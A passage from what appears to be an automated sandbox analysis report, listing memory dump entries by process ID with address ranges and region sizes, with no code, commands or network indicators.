                                                                                                                                            • memory/3864-236-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4000-116-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4000-118-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4060-231-0x0000021593780000-0x00000215937F0000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              448KB

                                                                                                                                            • memory/4060-193-0x00007FF634944060-mapping.dmp
                                                                                                                                            • memory/4112-153-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4256-365-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4264-313-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4304-178-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4328-338-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4336-154-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4384-359-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4424-156-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4428-181-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4432-369-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4504-332-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4504-336-0x0000000000540000-0x000000000068A000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              1.3MB

                                                                                                                                            • memory/4504-335-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              64KB

                                                                                                                                            • memory/4592-230-0x0000000000A20000-0x0000000000A21000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4592-240-0x0000000001140000-0x0000000001141000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4592-254-0x000000001B7B0000-0x000000001B7B2000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              8KB

                                                                                                                                            • memory/4592-243-0x0000000001150000-0x000000000116B000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              108KB

                                                                                                                                            • memory/4592-247-0x0000000001170000-0x0000000001171000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4592-221-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4604-356-0x0000000000402F68-mapping.dmp
                                                                                                                                            • memory/4604-358-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              48KB

                                                                                                                                            • memory/4612-158-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4612-162-0x00000000005A0000-0x00000000005B2000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              72KB

                                                                                                                                            • memory/4612-161-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              64KB

                                                                                                                                            • memory/4724-364-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4808-349-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4844-324-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4860-163-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4872-201-0x0000000000DC0000-0x0000000000E1C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              368KB

                                                                                                                                            • memory/4872-199-0x0000000000AFE000-0x0000000000BFF000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              1.0MB

                                                                                                                                            • memory/4872-183-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4876-361-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4884-182-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4948-283-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4948-294-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4948-296-0x00000000059D0000-0x00000000059D1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/4952-368-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4952-362-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4960-367-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4988-343-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/4988-357-0x0000000000500000-0x000000000050C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              48KB

                                                                                                                                            • memory/4992-164-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5000-187-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5076-167-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5116-177-0x0000000005640000-0x0000000005641000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5116-170-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5116-173-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5232-315-0x0000000005460000-0x0000000005461000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5232-310-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5296-308-0x00000000052E0000-0x00000000052E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5296-314-0x0000000004CD0000-0x00000000052D6000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              6.0MB

                                                                                                                                            • memory/5296-304-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              112KB

                                                                                                                                            • memory/5296-305-0x00000000004171EE-mapping.dmp
                                                                                                                                            • memory/5296-309-0x0000000004D90000-0x0000000004D91000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5400-342-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5472-295-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5548-341-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5620-297-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5624-347-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5668-327-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5668-366-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5696-275-0x00000000025E0000-0x000000000260A000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              168KB

                                                                                                                                            • memory/5696-293-0x0000000004E20000-0x0000000004E21000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5696-263-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5696-266-0x00000000003E0000-0x00000000003E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5696-277-0x0000000004D80000-0x0000000004D81000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5696-268-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5696-280-0x0000000004D30000-0x0000000004D31000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5788-274-0x00000000010A0000-0x00000000010A1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5788-276-0x00000000012E0000-0x00000000012F2000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              72KB

                                                                                                                                            • memory/5788-282-0x0000000002BF0000-0x0000000002BF1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5788-279-0x000000000E400000-0x000000000E401000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5788-272-0x0000000000A60000-0x0000000000A61000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5788-278-0x00000000054E0000-0x00000000054E1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5788-269-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5788-281-0x000000000DFA0000-0x000000000DFA1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5796-316-0x00007FF634944060-mapping.dmp
                                                                                                                                            • memory/5796-317-0x000002D865F90000-0x000002D865FDB000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              300KB

                                                                                                                                            • memory/5796-346-0x000002D868900000-0x000002D8689FF000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              1020KB

                                                                                                                                            • memory/5796-319-0x000002D8662D0000-0x000002D866341000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              452KB

                                                                                                                                            • memory/5816-322-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5856-354-0x0000000004762000-0x0000000004763000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5856-353-0x0000000004760000-0x0000000004761000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5856-352-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5888-331-0x000000000042977E-mapping.dmp
                                                                                                                                            • memory/5888-348-0x00000000054A0000-0x00000000054A1000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/5904-318-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/5928-363-0x0000000000000000-mapping.dmp
                                                                                                                                            • memory/6036-300-0x0000000000000000-mapping.dmp